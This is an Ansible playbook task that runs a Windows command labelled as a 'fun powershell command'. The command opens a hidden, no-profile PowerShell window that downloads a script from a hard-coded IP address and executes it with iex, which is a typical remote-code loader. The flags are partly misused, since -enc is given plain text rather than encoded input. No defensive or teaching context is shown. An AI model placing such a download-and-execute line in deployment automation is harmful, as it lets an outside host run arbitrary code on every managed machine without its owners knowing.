#########################################################
# Run powershell command
#########################################################
- name: Running fun powershell command
  win_command: powershell.exe -Sta -Nop -Window Hidden -enc iex (New-Object Net.WebClient).DownloadString('http://129.21.228.140/l/wow')




